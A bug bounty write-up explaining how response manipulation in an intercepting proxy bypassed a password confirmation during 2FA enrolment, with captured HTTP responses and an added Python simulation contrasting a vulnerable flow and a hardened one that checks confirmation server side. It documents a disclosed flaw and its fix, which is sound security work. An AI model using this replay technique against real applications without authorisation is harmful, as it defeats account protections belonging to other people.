How response Manipulation got me a little, but sweet Bounty

4 years ago 212

When enabling 2FA (write-up soon on how I was able to bypass it), the app asked for a password confirmation, so I thought: why not give the so-called response manipulation a try?

The Workflow

Now, how do you test for it? The idea is simple: first work out whether response manipulation is even possible, then try to exploit it. But how do you know it is possible? When the goal is to bypass an authentication step, my rule of thumb is to look at what happens right after the step you want to bypass: does that endpoint trigger another action before the process completes, or does the process complete immediately after the auth form? For example, if you want to bypass an OTP check: after entering the right code, does the app say “OK, you have completed the OTP process, now log in”? Or does it go on to ask for something else, such as a password or your sex? If you get the first, response manipulation will not bypass the OTP; if you get the second, it might. There is one more thing to check before trying it: after you answer that next question (the password, the sex, whatever it is), is the code (or whatever you wanted to bypass) still present in the data exchanged at that next step? For example, if after clicking the male button you see:

otp=1111&other_data=other_data

then it is not possible (the later step can still validate the code), but if you only see:

other_data=other_data

then it may be possible to bypass the OTP code using response manipulation.

The one I found

Now you know enough about response manipulation to follow what happens next.

When enabling 2FA, the app first asked for a password confirmation (you already know that :D). After entering the right password, the response looked like this:

HTTP/1.1 200 OK
Date: Tue, 28 Jul 2020 11:30:14 GMT
Content-Type: application/json
Connection: close
Set-Cookie: __cfduid=somecookie; expires=Thu, 27-Aug-20 11:30:14 GMT; path=/; domain=*.redacted.com; HttpOnly; SameSite=Lax; Secure
Cache-Control: no-cache, private
X-RateLimit-Limit: 100
X-RateLimit-Remaining: 99
Z-Redacted-Password-Auth-Valid-Until: 1595935589
Strict-Transport-Security: max-age=31536000; includeSubDomains
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
Content-Length: 480

{"data":{"type":"createtwofa","attributes":{"secret":"code","qr":"someurl","qr_url":"anotherurl"},"id":"a code(not the password it asked)"},"last_user_action":{"date_iso8601":"2020-07-28T13:30:14+02:00","unix":"1595935814"}}

After this, the app displayed the secret and the QR code. I scanned it with Google Authenticator and clicked next; it asked for the authenticator code and then confirmed that 2FA was enabled. The conditions from the workflow above were met: the password step triggered a further action (the QR scan and code entry), and the password itself was not carried along into that step. So it was worth trying to bypass the password check using response manipulation.

So I disabled 2FA and tried to enable it again. When it asked for the password confirmation, I entered a wrong one and got this response:

HTTP/1.1 422 Unprocessable Entity
Date: Tue, 28 Jul 2020 11:41:27 GMT
Content-Type: application/json
Content-Length: 177
Connection: close
Set-Cookie: __cfduid=somecookie; expires=Thu, 27-Aug-20 11:41:26 GMT; path=/; domain=redacted.com; HttpOnly; SameSite=Lax; Secure
Cache-Control: no-cache, private
Access-Control-Allow-Headers: origin, content-type, access-token, x-tracking-id
Access-Control-Allow-Origin: *
X-RateLimit-Limit: 100
X-RateLimit-Remaining: 99
X-BRedacted-Password-Auth-Valid-Until: 1595935589
Strict-Transport-Security: max-age=31536000; includeSubDomains
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare

{"errors":[{"status":422,"code":"user.validation.exception","title":"Validation exception"}],"last_user_action":{"date_iso8601":"2020-07-28T13:41:27+02:00","unix":"1595936487"}}

I then replaced it in the proxy with the earlier successful response:

HTTP/1.1 200 OK
Date: Tue, 28 Jul 2020 11:30:14 GMT
Content-Type: application/json
Connection: close
Set-Cookie: __cfduid=somecookie; expires=Thu, 27-Aug-20 11:30:14 GMT; path=/; domain=*.redacted.com; HttpOnly; SameSite=Lax; Secure
Cache-Control: no-cache, private
X-RateLimit-Limit: 100
X-RateLimit-Remaining: 99
Z-Redacted-Password-Auth-Valid-Until: 1595935589
Strict-Transport-Security: max-age=31536000; includeSubDomains
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
Content-Length: 480

{"data":{"type":"createtwofa","attributes":{"secret":"code","qr":"someurl","qr_url":"anotherurl"},"id":"a code(not the password it asked)"},"last_user_action":{"date_iso8601":"2020-07-28T13:30:14+02:00","unix":"1595935814"}}

I forwarded it and followed the process; 2FA was enabled without a valid password ever being supplied. The only thing gating the next step was the client's reading of the response: the endpoint that actually enabled 2FA never checked, server side, that the password confirmation had succeeded. “Secure web app design principles” bypassed.
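To make the workflow section and this finding concrete, here is an added model of the enrolment flow (example code, not the target's or the author's): a two-step server with a switch between the behaviour seen above (the enable step never checks that the password step succeeded) and a hardened variant that records the password confirmation server side and requires it, fresh, at the enable step. The browser is simulated by a function, and the proxy by an interceptor that swaps a 422 for a previously captured 200, which is exactly the manipulation described above. Endpoint names, the 300-second window, the session layout, the password and the frozen clock value are all assumptions made for the example.

```python
import hashlib
import hmac
import secrets

REAUTH_WINDOW = 300   # seconds a password confirmation stays valid (assumed value)
TOTP_STEP = 30        # RFC 6238 default time step


def totp(secret_hex, now, digits=6):
    """RFC 6238 TOTP over HMAC-SHA1, as an authenticator app computes it from the QR secret."""
    counter = int(now // TOTP_STEP).to_bytes(8, "big")
    mac = hmac.new(bytes.fromhex(secret_hex), counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return f"{code % 10 ** digits:0{digits}d}"


class TwoFAService:
    """Server side of the enrolment flow (hypothetical). enforce_reauth=False reproduces
    the behaviour in the write-up: step 2 never checks that step 1 actually succeeded."""

    def __init__(self, password, enforce_reauth, clock):
        self._password = password.encode()
        self.enforce_reauth = enforce_reauth
        self.clock = clock  # callable returning the current unix time
        self.session = {"reauth_valid_until": 0, "pending": None, "twofa_enabled": False}

    def confirm_password(self, candidate):
        """Step 1 (the password confirmation): 422 on a wrong password, otherwise 200 with a
        fresh secret. The 200 also records the confirmation in the server-side session."""
        if not hmac.compare_digest(candidate.encode(), self._password):
            if self.enforce_reauth:
                self.session["reauth_valid_until"] = 0  # a failed attempt revokes any earlier one
            return 422, {"errors": [{"status": 422, "code": "user.validation.exception"}]}
        secret, pending_id = secrets.token_hex(10), secrets.token_hex(8)
        self.session["pending"] = {"id": pending_id, "secret": secret}
        self.session["reauth_valid_until"] = self.clock() + REAUTH_WINDOW
        return 200, {"data": {"type": "createtwofa", "id": pending_id,
                              "attributes": {"secret": secret}}}

    def enable(self, pending_id, code):
        """Step 2 (submitting the authenticator code). The hardened variant requires a live,
        server-recorded password confirmation; the client's view of step 1 is never trusted."""
        pending = self.session["pending"]
        if pending is None or pending["id"] != pending_id:
            return 422, {"errors": [{"code": "no_pending_enrolment"}]}
        if self.enforce_reauth and self.clock() > self.session["reauth_valid_until"]:
            return 403, {"errors": [{"code": "password_confirmation_required"}]}
        if not hmac.compare_digest(code, totp(pending["secret"], self.clock())):
            return 422, {"errors": [{"code": "invalid_totp"}]}
        # One confirmation buys one enrolment: clear both pieces of state.
        self.session.update(twofa_enabled=True, pending=None, reauth_valid_until=0)
        return 200, {"data": {"type": "twofaenabled"}}


def browser_enrol(service, password_typed, interceptor=None):
    """What the web client does. The UI stops on a non-200, otherwise it reads the secret
    out of the body (the QR code) and submits the TOTP. ``interceptor`` models the proxy."""
    status, body = service.confirm_password(password_typed)
    if interceptor is not None:
        status, body = interceptor(status, body)
    if status != 200:
        return status, body
    pending_id = body["data"]["id"]
    secret = body["data"]["attributes"]["secret"]
    return service.enable(pending_id, totp(secret, service.clock()))


def make_replay_interceptor(saved_200):
    """Response manipulation: replace any 422 with a previously captured 200 body."""
    def intercept(status, body):
        return (200, saved_200) if status == 422 else (status, body)
    return intercept


def run_scenario(enforce_reauth):
    """Returns (status of the enable step, whether 2FA ended up enabled)."""
    clock = [1_595_935_814.0]  # frozen clock; constructed from the unix time in the response above
    svc = TwoFAService("correct horse", enforce_reauth, lambda: clock[0])
    # 1. A genuine confirmation; the tester captures the 200 in the proxy.
    status, saved_200 = svc.confirm_password("correct horse")
    assert status == 200
    # 2. Later, past the assumed window, retry with a wrong password and replay the
    #    captured 200 so the client shows the old QR code and continues.
    clock[0] += REAUTH_WINDOW + 100
    status, _ = browser_enrol(svc, "wrong", make_replay_interceptor(saved_200))
    return status, svc.session["twofa_enabled"]


if __name__ == "__main__":
    print("vulnerable:", run_scenario(enforce_reauth=False))  # (200, True)
    print("hardened:  ", run_scenario(enforce_reauth=True))   # (403, False)
```

Against the vulnerable variant the replayed 200 is enough: the client hands the server a pending id and a valid TOTP for the old secret, and nothing on the server asks whether the password was ever confirmed in this attempt. The hardened variant ties the enable step to a server-side timestamp that only a correct password sets, that a failed attempt clears, and that expires; the same manipulation then ends in a 403, which is the outcome a tester should expect when the triage in the workflow section says the bypass is not possible.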
